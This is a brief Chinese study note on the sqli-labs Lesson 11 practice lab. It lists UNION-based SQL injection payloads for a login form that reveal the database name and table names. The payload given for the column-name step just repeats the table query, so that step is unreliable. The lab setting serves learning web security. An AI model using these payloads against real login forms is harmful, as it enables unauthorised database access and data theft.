sqli_labs lesson11 学习笔记

经过分析可以发现程序对参数进行单引号的处理。
在username框中输入1' union select 1,database()# password框中随便输入一个 1

sqli_labs lesson11 学习笔记

可以发现当前的数据库是security在username框中输入1' union select 1,database()# password框中随便输入一个 1

- 在username框中输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'# password框中随便输入一个 1 来查看表名
接下来查看列名输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
接下来我们就可以查看数据了

相关文章：

猜你喜欢

相关资源

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode